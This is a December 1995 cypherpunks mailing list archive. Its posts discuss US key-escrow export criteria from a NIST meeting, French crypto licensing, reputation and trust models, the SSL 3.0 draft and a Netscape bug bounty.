13:47:13 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 5 Dec 95 13:47:13 PST Subject: French crypto restrictions - update ? In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com> Message-ID: <9512052148.AA00712@hplyot.obspm.fr> Yes Netscape got the authorisation to sell Netscape navigator in France (40 bits) but there is no policy changes or whatever, it is still a tedious product by product process to get auth for crypto and obviously, you'rent going to get an auth for PGP any real soon... :-( futplex at pseudonym.com writes: > Sorry, this has nothing to do with Netscape's position on GAK: > > Jim Clark writes (via Jeff Weinstein): > > Until recently, France did not even > > allow us to sell products with 40-bit keys, much less 128-bit keys. > > I'm curious about this. Were Chirac et compagnie simply dragging their feet > on granting a license, have they made an actual policy change, or did they > realize they could do what Damien did ? It would be interesting to see more > information on this development. (There's a paranoid conspiracy theory I > could add to the pile here, but I don't believe it and we seem to be knee-deep > in them at the moment....) > > -Futplex > Let's wait and see > dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept cryptographic assassination PGP Peking explosion security SDI From dl at hplyot.obspm.fr Tue Dec 5 13:51:07 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 5 Dec 95 13:51:07 PST Subject: prototype slot-machine In-Reply-To: <199512030850.AAA03618@ix3.ix.netcom.com> Message-ID: <9512052151.AA00725@hplyot.obspm.fr> You can play as low as $0.5 on my pseudo slot machine, cyberbucks only (legal issues). Nice graphics and *feedback* (unlike most shop software) but sorry, no sound yet :-) http://www.box.eu.org/~dl/inc/play.shtml ps: 1 you can win upto $70 2 sorry if it sound like an ad, but the Q was to be answered... Bill Stewart writes: > At 10:23 PM 12/2/95 -0800, sameer wrote: > > I've written up a slot-machine thing for ecash, very > >experimental, very buggy, not very slick, (i'd like to get the > >technical bugs worked out before i put a fancy wrapper on it) and i'd > >*like* to announce it here for testing, but I'm worrying about > >gambling laws.. > > any thoughts? > Use the demo digicash; it's not real money, and it's never been > illegal to play for poker chips. The mere fact that there's an exchange > market for real money vs. digicash play money doesn't change that. > It'd be nice if you take small bets, since many of us only have $100 > or so of play money; quarters should be fine. > To do the job right, you need audio.... dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept GIA jihad North Korea FBI Clinton supercomputer Cocaine From tallpaul at pipeline.com Tue Dec 5 13:58:43 1995 From: tallpaul at pipeline.com (tallpaul) Date: Tue, 5 Dec 95 13:58:43 PST Subject: Clarinet News Articles #1 [POINTER] Message-ID: <199512052159.QAA12946@pipe1.nyc.pipeline.com> The following news articles may be of interest to list subscribers: clari.news.censorship: Landmark First Amendment case 4 Dec 95, 12:00 clari.news.censorship: Donna Rice Fights Cybersmut 1 Dec 95, 21:01 clari.news.sex: Sponsor of cyberporn legislation 4 Dec 95, 14:20 clari.news.sex: Internet Smut Pact Reached 2 Dec 95, 07:10 --tallpaul at pipeline.com From sjb at universe.digex.net Tue Dec 5 14:22:26 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Tue, 5 Dec 95 14:22:26 PST Subject: towards a theory of reputation In-Reply-To: <199512052029.MAA08717@jobe.shell.portal.com> Message-ID: <199512052222.RAA07434@universe.digex.net> Hal writes: >From: Scott Brickner >> Analytically, using an escrow agent doesn't change the utility >> function. It replaces the trading partner's honesty reputation >> estimate with the escrow agent's (which is presumably higher, or why >> use them?). This is just a parameter substitution. >> >> Whence comes the intractability? > >By the "utility function" I was referring to Wei's model in which each >person has an idea of how much "utility" (a general summation of >personal value and usefulness) they would get from another person, as a >function of cost. The utility function takes cost as input and returns >"utiles" (or whatever) as output. So, with this model, using an escrow >agent would change the utility function; for a given cost, the utility >of a person to me would change (say, if the person involved were >thought to be dishonest, then the presence of escrow agents would make >him more useful to me). The utility function in Wei's model is a curve >where the Y axis is utility and the X axis is cost. Changing the >importance of honesty will change the position and shape of this >curve. > >I think it would be more tractable to have a model in which honesty >played an explicit part. We might even make assumptions about the >mathematical relationship between honesty and overall utility - for >example, that utility to me would be monotonically increasing with >increased honesty of the other guy. I had in mind that the utility function was being used by some agent to determine its course of action. Imagine the agent trying to determine which of several services to use. It may reasonably be expected to evaluate the utility function for each one, and choose the one with the highest utility. "Reputation for honesty" is one parameter to the function. Price, turnaround, and reputation for quality are others. A smarter agent could consider "metaservices" which bundle the given service with an escrow agent. The net effect is to permit the agent to replace the service's honesty with the escrow agent's for the evaluation --- regardless of the internals of the model. >What I mean is something like this. Let t be the degree of trust >necessary for a business relationship to be consummated. For t=0, no >trust is needed, and the relationship is such that neither party takes >any significant risk - a cash sale, perhaps. For t=1, in some sense >total trust is needed, and a party can cheat the other with 100% safety. > >Now let h(t) be the honesty reputation of a person, so that the utility >which people expect to receive from them gets multiplied by h(t). For a >person with a repuation for honesty, h(t) is close to 1 for all t. For a >person who seems dishonest, h(t) will go from 1 to 0 as t goes from 0 to >1. > >This is all pretty hand-wavy, but the idea would be to come up with good >strategies to estimate h(t) from a person's behavior, and good ways to >choose what kind of behavior one should follow given the value(s) of t >which are prevalent in the market. This kind of analysis would lead you >to focus on the importance of the amount of trust needed in a transaction. >The underlying utility function is based on such traditional factors as >productivity and reliability. It won't change as we consider the >variables of our analysis, because we have factored out the honesty and >trust issues so that they are more explicit. That's the kind of >direction I was suggesting. The strategy for estimating h(t) should be wholly independent of the utility model. Otherwise you'd be effectively unable to make efficient use of rating services, which do such evaluations as their business. From pfarrell at netcom.com Tue Dec 5 14:48:32 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Tue, 5 Dec 95 14:48:32 PST Subject: NIST GAK export meeting, short version Message-ID: <64158.pfarrell@netcom.com> I just got back from the NIST GAK export meeting. This is a short writeup of a summary. I'll post a longer version later this evening or early tomorrow morning. The meeting was hosted by Ed Roback of NIST, who quickly introduced Mike Nelson of the White House. Mike is clearly a political guy. His handout says: "We believe that our proposal for exportable 64-bit key escrow encryption meets these goals [the goals of VP Gore's letter to Rep Cantwell, July 20, 1994]." He said that the criteria describe a solution, but not the only solution. He said it does not preclude other implementations in the future. He anticipates that the State Department will issue guidance based upon these criteria in "early 1996," and that between now and then, any product that meets the criteria will be elegible for expidited approval. Of course, the existing (slow as molasass) process will continue. I asked the first questions from the floor. The two questions were: (1) Is this meeting concerned solely with export of software, or does it deal with controling domestic use of strong cryptography? and (2) since the 64-bit limit was severly criticized at the Sept meeting, why is it still needed if there is also escrow? His answer was that there is "no intention to control domestic encryption" and on the 64-bit issue, that the government is "not certain it will work." he says they "want to see it implemented and want to see how it works" because 64-bit encryption is very strong. If the escrow doesn't work, they don't want a lot of softare to be in widespread use. He said that they have studied the encryption that is supposed to be widely available on the Internet. He said that viewed by crypto experts, not much is very good. He mentioned "two incidents" where Netscape had weak implimentations. He feels that companies will not trust software over the 'net. that they "want the US Government to say that 'this is good enough'." Clint Brooks, of NSA, then went over the revised criteria. He claimed that they were surprized at the industry concern over "one product" for worldwide markets. There were lots of questions. He eventually admitted that because of the "one product" concern, export regulations will effect domestic products. [all the more reason for Netscape to keep building ten or whatever it is.] Brooks admitted that it is impossible to prevent multiple encryption. Cypherpunks would do that by using PGP and then sending it using GAK. He said "as a person, you can set up a secure communication method, and nothing can be done about it." His concern is not that smart people can have stronger crypto, but that strong crypto will be easy and widely used. He said that the 64-bit key limit is not meant to restrict RSA keys to 64-bits, but rather to restrict the session keys that are encrypted using RSA. Unspoken was the assumption that the 2000 bit RSA secret key would have to be escrowed. There were some interesting (and bad IMHO) implications of interoperability. I'll cover them more in the long version. Basically, they admitted that the interoperability restrictions made it stupid to have an export version, you should have a strong domestic version, and an international version developed offshore for sale to the rest of the world. They admitted that there can be no controls over export of data, so once interoperating software is available both domestically and from offshore sources, there is no value in the export controlled, crippled version. My favorite policeman, Geoff Greiveldinger, then described the characteristics of an acceptable key escrow agent. There was a long list of criteria, all unseen before the meeting. The general reaction of the audience was that these were "yet another set of criteria that must be met." Geoff claimed that they were simply trying to address the questions raised at the earlier meeting about who is an acceptable escrow agent. One point that caused a lot of concern was that at least one employee of the escrow agent has to have a SECRET clearence. Industry, with a few exceptions, soundly said that this is a dumb idea, that there is no market, that the criteria are too hard, etc. Except Padgett Petersen, representing Lockheed-Martin. He said that LM thought that the criteria were just peachy. The usual civil liberties folks also soundly trashed it. There was a representative from Netscape. He said that they, as a company think this is a terrible idea. They oppose it now, and will be issuing a company policy soon. I didn't catch his name, and couldn't find him to get the obviously carefully prepared text. If someone from Netscape, are you listening Jeff W? could get me the text, I'll add it to my writeup. ****************** What I think it means: I believe that the government deeply wants to restrict domestic use of strong encryption, but they have no legal justification for doing so. They can't expect that they will get it if they go to Congress. So they are attempting an end-arround using the export criteria, which they _do control_. They hope that the pain of having multiple versions will be so high that no vendor will bother, and all we'll have is crippled software. The usual civil liberties lobby folks (CDT, EPIC, etc.) want to hold their own, industry sponsored meetings to develop workable systems. I think that the real key is for everyone, worldwide to insist on both strong crypto and interoperability. The Germans are already writing fine software and making fast hardware. Microsoft and Netscape can easily afford to do some of their development offshore. If the products sell and are deployed, it won't matter what the govies want. Pat ps. there were a number of other cypherpunks in attendance. I hope some will add their impressions of the day. Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From stewarts at ix.netcom.com Tue Dec 5 15:25:30 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 5 Dec 95 15:25:30 PST Subject: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security" Message-ID: <199512052326.PAA18556@ix4.ix.netcom.com> At 09:47 PM 12/5/95 MET, Andreas Bogk wrote: > Bryce> To secure Net communications, the government will > Bryce> need to have access to private data exchanges using what is > Bryce> known as a key escrow security system, said Clark. He added > >Who was the guy who asked why "we" are mad at netscape? Well, I am >because of exactly this blatant lie. If you examine the grammar carefully, it's not a blatant lie, it's quite correct. If the government is going to "secure" (either using the definition of "obtain for oneself" or "tie down") Net communications, it will need to use some obnoxiously interfering technique, and so-called key-escrow is one way to do it. Alternatively, using the definition of "secure" as "protect", it will need to have access to private communications only through security systems such as _real_ escrow, in which some mutually trusted third party holds some assets until both parties have fulfilled the terms of the escrow contract. If you don't have a mutually trusted third party, or one party doesn't deliver an asset it's supposed to, or the other party doesn't play fair, then the transaction fails; making sure it succeeds or fails cleanly, and verifying the status of the transaction at any time, is the escrow agent's job. Government Access to Keys (GAK) is something radically different; the government agrees not to interfere with your communications if you deliver your keys to some other part of the government. There's no trusted third party (unless you trust the government), wiretap rules generally forbid verifying to the victim whether his communications are tapped or not, and the deal with the non-independent escrow agent allows the government to change the terms of the so-called escrow at any time, unlike a real escrow agreement. (In other words, it's a lie, a total crock, and absolutely UnAmerican, and there isn't even a House UnAmerican Activities Committee* to complain to :-) [ * Translation for you non-Americans; the term "UnAmerican" means "something the good honest people of this country disapprove of, like Communism and Socialism and maybe Communism and even occasionally Fascism in extreme cases and especially Communism (but certainly not things like racism or militarism or corrupt lying politicians)" The House UnAmerican Activities Committee was a committee of Congressmen who went around investigating anybody they didn't like and suspected of being Communist, or could accuse of being Communist if they didn't like them. They were most active during the 1950s and 1960s, and are fortunately gone by now.] #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From jsw at netscape.com Tue Dec 5 15:40:49 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 5 Dec 95 15:40:49 PST Subject: Netscape Bug Bounty... Message-ID: <199512052338.PAA06971@ammodump.mcom.com> FYI, since both the bounty and the particular bug have been discussed here... We are awarding Scott Weston $1000 for reporting the LiveScript history problem. The announcement should show up on our Bug Bounty winner's page by tomorrow. --Jeff Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rsalz at osf.org Tue Dec 5 15:52:24 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 5 Dec 95 15:52:24 PST Subject: NIST GAK export meeting, short version Message-ID: <9512052349.AA28680@sulphur.osf.org> >_do control_. They hope that the pain of having multiple versions will be >so high that no vendor will bother, and all we'll have is crippled >software. >I think that the real key is for everyone, worldwide to insist on >both strong crypto and interoperability. Anything that uses cryptography absolutely and positively *must* support multiple cryptographic protocols. Tag every RPC, transaction, method invocation, what-have-you with some indicator that indicates not only "encrypted" but "encrypted via method 2". Allow customers to specify policy, at least via an environment variable such as NETSCAPE_SSL_PROTECTION=1,2,4 where the online documentation says 1 = 512bit RSA 2 = 256bit RSA 4 = Rot 13 Design open, extensible architectures with public registries and protocol descriptions. /r$ From EALLENSMITH at mbcl.rutgers.edu Tue Dec 5 16:03:09 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Tue, 5 Dec 95 16:03:09 PST Subject: [Political Noise?] Banking law changes proposed Message-ID: <01HYGJ5YZQHC9S3QEI@mbcl.rutgers.edu> In regard to the following, I wonder if anyone knows if they're also proposing changes that will make banking secrecy more difficult? I know about the other proposals (Carribean treaty and all that), but this report isn't complete enough to tell if Greenspan and the other regulators are also suggesting things. -Allen -------------------------------------------------------------------------------- (c) 1995 Copyright Nando.net (c) 1995 Associated Press WASHINGTON (Dec 5, 1995 - 16:57 EST) -- Foreign banks can expect greater scrutiny of their trading, auditing and other internal controls in the wake of the Daiwa and Barings Bank disasters, Federal Reserve Board Chairman Alan Greenspan and other regulators said Tuesday. Greenspan and others told a House Banking subcommittee that with the lightning quick movement of money around global computer networks, a breakdown in internal systems could cause losses that spill over into the broader financial system. [...] Greenspan and a top House Republican, Rep. Marge Roukema, R-N.J., supported stricter audit standards for banks. "We are considering a number of initiatives that may be implemented at an administrative level, especially with respect to internal and external controls," Greenspan told a House Banking subcommittee on financial institutions. [...] Roukema and the panel's leading Democrat, Rep. Bruce Vento, D-Minn., said they want the General Accounting Office to study the adequacy of a 1991 law aimed at improving U.S. supervision of foreign banks. Vento cited a string of international banking scandals in recent years, ranging from collapse of Barings Bank to the problems surrounding Bank of Credit and Commerce International, and said that the global supervision system suffers from "a serious problem." [...] Greenspan said international bank regulators are recognizing they must work together more closely to protect the integrity of the global banking system. Japan's Ministry of Finance drew heavy criticism in the Daiwa case for waiting six weeks before informing U.S. regulators about Daiwa's losses last summer. From gates_r at maths.su.oz.au Tue Dec 5 16:03:36 1995 From: gates_r at maths.su.oz.au (Robbie Gates) Date: Tue, 5 Dec 95 16:03:36 PST Subject: Secure versus ? In-Reply-To: <9512051652.AA17214@ua.MIT.EDU> Message-ID: <30C4DED5.15FB@maths.su.oz.au> solman at MIT.EDU wrote: > Alice wants to use the inner loop to send bit b. > 1. Alice randomly chooses seven bits of salt, and prepends b to them > creating an 8 bit M > 2. Alice randomly chooses an (Na,Ea) pair from the list of possibilities. > 3. Alice calculates D such that E*D mod (N-1) equals 1 > 4. Bob randomly chooses an (Nb,Eb) pair from the list of possibilities. > 5. Bob calculates D > 6. Alice sends Bob the nine bit number (M^Ea) mod Na = C1 > 7. Bob sends Alice (C1^Eb) mod Nb = C2 > 8. Alice sends Bob (C2^Da) mod Na = C3 > 9. Bob calculates (C3^Db) mod Nb = M, the bit being the MSB. i don't think the maths works here ... let Na = 257, Ea = 13, Da = 197, Nb = 263, Eb = 11, Db = 143 choosing M = 2, i calculate C1 = 225, C2 = 144, C3 = 205, C4 = 33 != M (and bottom bit is different) choosing M = 7, i get C1 = 127, C2 = 53, C3 = 19, C4 = 139 != M (and top bit is different) so your channel doesn't get the bit from alice to bob ... the problem is that you are mixing reduction modulo two different numbers Na and Nb ... this screws up the powering law you are trying to use. - robbie -- ---------------------------------------------------------------------- robbie gates | it's not a religion, it's just a technique. apprentice algebraist | it's just a way of making you speak. pgp key available | - "destination", the church. From nobody at REPLAY.COM Tue Dec 5 16:04:06 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 5 Dec 95 16:04:06 PST Subject: NIST GAK export meeting, sv Message-ID: <199512052356.AAA09563@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- - From Pat Farrell's short summary of the NIST GAK meeting (12/5/95 5:49 PM): >My favorite policeman, Geoff Greiveldinger, then described the >characteristics of an acceptable key escrow agent. There was a long list >of criteria, all unseen before the meeting. The general reaction >of the audience was that these were "yet another set of criteria that >must be met." Geoff claimed that they were simply trying to address >the questions raised at the earlier meeting about who is an >acceptable escrow agent. One point that caused a lot of concern >was that at least one employee of the escrow agent has to have a SECRET >clearence. (Thanks for the summary, Pat.) This last bit is really rich. I can't think of a single publically defensible reason for the stipulation that every escrow agent must employ someone with SECRET clearance, but I *can* think of a publically indefensible reason for it -- to facilitate those spooky non-court wiretap authorizations that've been alluded to in the fine print of the GAK proposals. Of course, just because escrow agents would be required to hire *someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET clearance would fill the bill. And that's the rub: the administration of clearing people-with-SECRET-clearances for escrow agent employment would be conducted -- where else? -- *in secret*. SECRET clearance, of course, wouldn't be the salient criterion; after all, there are people on the Cypherpunks list -- and a few who aren't on it but are like-minded -- who'd be, uh, reluctant to deliver keys in the absence of a a wiretap authorized by a judge. And, as a petty aside, it's nice to see that the gov't had cooked up yet another way to force potentially legitimate businesses to pay its stoolpigeons to chip away out our civil rights. Hieronymous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMTbw73g0mNE55u1AQEyPQIAsFDidHJrD7fjCee8Wa7ufj7MFnvJGYCQ zGZR7VdtpV4IGp52SvW8UBiJjv7FeWkmwwGWD43MN/88f79MpTCO3Q== =DOoi -----END PGP SIGNATURE----- From joe_tardo at genmagic.com Tue Dec 5 16:27:56 1995 From: joe_tardo at genmagic.com (Joe Tardo) Date: Tue, 5 Dec 95 16:27:56 PST Subject: French crypto restricti Message-ID: Reply to: RE>>French crypto restrictions - update ? Would this imply that Netscape supplied source code to SCSSI? From: Laurent Demailly > Yes Netscape got the authorisation to sell Netscape navigator in > France (40 bits) but there is no policy changes or whatever, it is > still a tedious product by product process to get auth for crypto and From jsw at netscape.com Tue Dec 5 16:36:45 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 5 Dec 95 16:36:45 PST Subject: NIST GAK export meeting, short version In-Reply-To: <64158.pfarrell@netcom.com> Message-ID: <30C4E4B1.40E9@netscape.com> Pat Farrell wrote: > He said that they have studied the encryption that is supposed to be widely > available on the Internet. He said that viewed by crypto experts, not > much is very good. He mentioned "two incidents" where Netscape had > weak implimentations. He feels that companies will not trust software > over the 'net. that they "want the US Government to say that 'this is > good enough'." Was he able to name any companies that would not buy products without the "US Government seal of approval"? It seems kind of odd that he is slamming Netscape for having had a weak implementation when he would love to force everyone to have a "weak implementation". I'm sure that he will be happy to know that we have fixed these weaknesses. :-) > Clint Brooks, of NSA, then went over the revised criteria. He claimed that > they were surprized at the industry concern over "one product" for > worldwide markets. There were lots of questions. He eventually admitted > that because of the "one product" concern, export regulations will effect > domestic products. [all the more reason for Netscape to keep building ten > or whatever it is.] Agreed. > There was a representative from Netscape. He said that they, as a company > think this is a terrible idea. They oppose it now, and will be issuing > a company policy soon. I didn't catch his name, and couldn't find him > to get the obviously carefully prepared text. If someone from Netscape, are > you listening Jeff W? could get me the text, I'll add it to my writeup. I assume you are talking about the exact text of the statement that our representative made at the meeting. I will try to get it, but it may take a day or two since they will be in DC until at least tomorrow. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From weidai at eskimo.com Tue Dec 5 17:00:39 1995 From: weidai at eskimo.com (Wei Dai) Date: Tue, 5 Dec 95 17:00:39 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: Message-ID: On Tue, 5 Dec 1995, Nathaniel Borenstein wrote: > In terms of crypto-privacy, anonymous communication, and things like > that, I agree completely. However, it's genuinely more complicated than > that where money is concerned, because there are aspects of the > translation between "bits and bucks" that have some extremely serious > practical complexities. > > A true geodesic structure is self-supporting and self-structuring. A > cryptographic infrastructure can and should be similar, I agree > completely. However, a *monetary* infrastructure needs convertability, > and the points of conversion are always the best targets of attack for > criminals. (I've been casting about for an analogy to physical > geodesics, and it's hard to find one. The best I can come up with is to > imagine that in order to convert a carbon buckyball to a more > conventional set of carbon molecules, you had to do it through a service > bureau that was capable of error, fraud, or subversion by outside > criminals. This would ONLY matter if you ever wanted to do such > conversions, but it would matter a lot then, especially if you had to > suffer a serious financial loss if you got the wrong carbon molecules at > the end of the process.) I agree that conversion points are good targets for attack. Therefore whether conversion services are centralized or distributed will partly depend on the economy of scale in protection against criminals. I'm not sure how much of this economy of scale exists for conversion between electronic and physical monetary instruments. But if we're converting between one eletronic system and another, then cryptographic protocols reduce the cost of protection to nearly zero for even small organizations. Wei Dai From tcmay at got.net Tue Dec 5 17:05:31 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 17:05:31 PST Subject: NIST GAK export meeting, sv Message-ID: Hieronymous at bosch.art wrote: > (Thanks for the summary, Pat.) I concure. Nice summary. I hope Pat doesn't run out of steam before getting the full version out (writing summaries can sometimes do that). > This last bit is really rich. I can't think of a single publically >defensible reason for the stipulation that every escrow agent must employ >someone with SECRET clearance, but I *can* think of a publically >indefensible reason for it -- to facilitate those spooky non-court wiretap >authorizations that've been alluded to in the fine print of the GAK >proposals. One "defensible" (and maybe even good) reason is because someone with government clearance can then be prosecuted for leaking what they know, whereas ordinary citizens are harder to prosecute for this. I doubt this is the main reason, but it makes a certain kind of sense. But there are other more interesting links between Secret clearances and wiretaps. The "Foreign Intelligence Surveillance Court" meets in Arlington, VA as the need arises to authorize wiretaps in private, for intelligence collection reasons. I think this has been discussed a couple of times on the list, so a search of the archives might be useful to those who are curious. (Also, a couple of the recent book on the Intelligence Support Activity, Ruby Fruit, etc., have details on how this court operates.) Though little of how GAK has been released (or reported here, or in the press), there is no doubt in my mind that this Foreign Intelligence court would of course continue to get its own wiretap authorizations. (And not only "foreigners" are involved: anyone who is believed to have importance to an intelligence matter is fair game for this court to consider. Which is not surprising, really, as the goal is partly to catch spies and plug security leaks--before someone goes ballistic and accuses me of Betraying the Cause, I'm just describing things as they are. And surely some security measures are warranted, even to Cypherpunks!) > Of course, just because escrow agents would be required to hire >*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET >clearance would fill the bill. And that's the rub: the administration of >clearing people-with-SECRET-clearances for escrow agent employment would >be conducted -- where else? -- *in secret*. SECRET clearance, of course, >wouldn't be the salient criterion; after all, there are people on the >Cypherpunks list -- and a few who aren't on it but are like-minded -- >who'd be, uh, reluctant to deliver keys in the absence of a a wiretap >authorized by a judge. > And, as a petty aside, it's nice to see that the gov't had cooked up >yet another way to force potentially legitimate businesses to pay its >stoolpigeons to chip away out our civil rights. Many think tanks and defense contractors have "sheep-dipped" retired intelligence officials working for them and continuing to report (in various ways) to their former paymasters. Sometimes these sheep-dipped agents are just there to keep tabs on what's going on, sometimes they're there to nudge these companies in certain directions, and sometimes they are actually running "deniable" applications from the private sector. (Recall Hughes, Air America, Castle Bank, etc.) I can imagine that if some companies talked about in connection with certain questionable activities (Banker's Trust, Bank of America, Wackenhut, SAIC, etc.) were to bid for the contract to be a GAK Agent, then there would be contacts back to the intelligence agencies. But most GAK accesses would be handled through normal channels, albeit secret. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From karlton at netscape.com Tue Dec 5 17:46:20 1995 From: karlton at netscape.com (Phil Karlton) Date: Tue, 5 Dec 95 17:46:20 PST Subject: New version of SSL 3.0 Message-ID: <30C4F630.794B@netscape.com> [This is the second try at sending this message.] SSL 3.0 protocol has been substantially changed from earlier drafts to fix a number of performance and cyrptographic issues. The latest version can be found as PostScript in a compressed tar file on ftp://ftp.netscape.com/pub/review/ssl-spec.tar.Z where is a digit in the range [2-8]. An HTML version should be available in a day or two. I will post the URL when that happens. Netscape is also in the process of submitting this draft to IETF. Questions and comments about this specification should all be directed to ssl-talk at netscape.com. Answers and replies will be posted there. We are quite interested in your feedback. As new eyes see the spec for the first time, I suspect that we will be notified about typos and areas that are not as clear as they should be. As a result, there will probably be an update in 2 weeks or so. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications From samman-ben at CS.YALE.EDU Tue Dec 5 18:56:14 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Tue, 5 Dec 95 18:56:14 PST Subject: CFP '96 Message-ID: I'm going to CFP '96 and was wondering if any cpunks wanted to share a hotel room with me(or even better, offer me crash space on the floor). If so, mail me and we'll work something out. And now back to your regularly scheduled rants and GAK'ing. Ben. ____ Ben Samman..............................................samman at cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman at powered.cs.yale.edu for key From perry at piermont.com Tue Dec 5 19:15:16 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 5 Dec 95 19:15:16 PST Subject: hack microsoft? Message-ID: <199512060316.WAA10681@jekyll.piermont.com> So, are the folks that broke the Microsoft password stupidity getting "Hack Microsoft" T shirts? .pm From nobody at REPLAY.COM Tue Dec 5 19:33:59 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 5 Dec 95 19:33:59 PST Subject: NIST GAK export meeting, sv Message-ID: <199512060335.EAA20054@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Tim May 12/5/95 6:25 PM: >> This last bit is really rich. I can't think of a single publically >>defensible reason for the stipulation that every escrow agent must employ >>someone with SECRET clearance, <> > >One "defensible" (and maybe even good) reason is because someone with >government clearance can then be prosecuted for leaking what they know, >whereas ordinary citizens are harder to prosecute for this. I doubt this is >the main reason, but it makes a certain kind of sense. Nice point, though I too doubt that's the reason: if *every* agent needed to be cleared, then this clearance stipulation would serve nicely, but if only *one* at every escrow agency needs to be cleared... >But there are other more interesting links between Secret clearances and >wiretaps. > >The "Foreign Intelligence Surveillance Court" meets in Arlington, VA as the >need arises to authorize wiretaps in private, >> Of course, just because escrow agents would be required to hire >>*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET >>clearance would fill the bill. >Many think tanks and defense contractors have "sheep-dipped" retired >intelligence officials working for them and continuing to report (in >various ways) to their former paymasters. > >Sometimes these sheep-dipped agents are just there to keep tabs on what's >going on, sometimes they're there to nudge these companies in certain >directions, and sometimes they are actually running "deniable" applications >from the private sector. (Recall Hughes, Air America, Castle Bank, etc.) > >I can imagine that if some companies talked about in connection with >certain questionable activities (Banker's Trust, Bank of America, >Wackenhut, SAIC, etc.) were to bid for the contract to be a GAK Agent, then >there would be contacts back to the intelligence agencies. Organizations like SAIC seem like "naturals" for GAK escrow agents -- and they're a forgone conclusion as far as spookery is concerned. What troubles me is the suggestion that *every* agent *must* hire someone who might answer to a higher authority, as it were. And what troubles me more is watching this paragovernment's transparent efforts to reproduce itself step by step, always trying to elude efforts to make it accountable or subordinate to civil authorities. >But most GAK accesses would be handled through normal channels, albeit secret. Of course. But most cops and prosecutors haven't developed the "national security" verbal tic. Yet. GAK stinks, but this security-clearance stipulation *really* stinks. Of course, I'm preaching to the choir... Hieronymous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMUMXL3g0mNE55u1AQHR0wIAj/86ga/1T0FJ7gZt5ZVwlCLt4pq2g0Nt QpoDWlul6q9ub51k3wwA6Kn1np3NMoYpjLS/bdPew0XUBMJpQs/l/Q== =AdMm -----END PGP SIGNATURE----- From st954a65 at dunx1.ocs.drexel.edu Tue Dec 5 19:37:21 1995 From: st954a65 at dunx1.ocs.drexel.edu (McGrath) Date: Tue, 5 Dec 95 19:37:21 PST Subject: Message-ID: <30C5105C.408F@post.drexel.edu> is this a mailing list or somthing if it is send it st954a65 at post.drexel.edu From pete at loshin.com Tue Dec 5 20:01:51 1995 From: pete at loshin.com (Pete Loshin) Date: Tue, 5 Dec 95 20:01:51 PST Subject: Secret Clearance (was: re: NIST GAK export meeting, sv) Message-ID: <01BAC365.EB89CDA0@ploshin.tiac.net> I'm definitely opposed to GAK, but the conspiracy theory approach to considering what it means to employ people with SECRET clearance may be getting a bit paranoid. >From working at an organization that did a lot of government work, my understanding of the process of clearing employees is this: -certain tasks require knowledge or access that must be restricted -you have to have a high degree of trust in the people doing those tasks -people with money troubles, out-of-control addictions, skeletons in the closet, and histories of "troubles" are prime targets for subversion -doing a clearance check (in theory) eliminates the possibility that these people will be blackmailed/bribed into revealing their secrets Not that this stuff always works in practice, considering that Aldrich Ames was an alcoholic with money troubles who then turned up with a lavish lifestyle, and no one he worked with noticed until it was pretty much too late. The point is, if you want to keep your organization's systems secure, you need some mechanism to do so. Security clearance is one way; banks and other financial institutions do other things (like finger prints, background checks, etc.) My big question is, do any of the companies providing Internet services, or Internet software, or digital commerce services/software, employ any of these security mechanisms on their employees? Comments or (preferably) references to actual practices? -Pete Loshin pete at loshin.com From sameer at c2.org Tue Dec 5 20:10:33 1995 From: sameer at c2.org (sameer) Date: Tue, 5 Dec 95 20:10:33 PST Subject: hack microsoft? In-Reply-To: 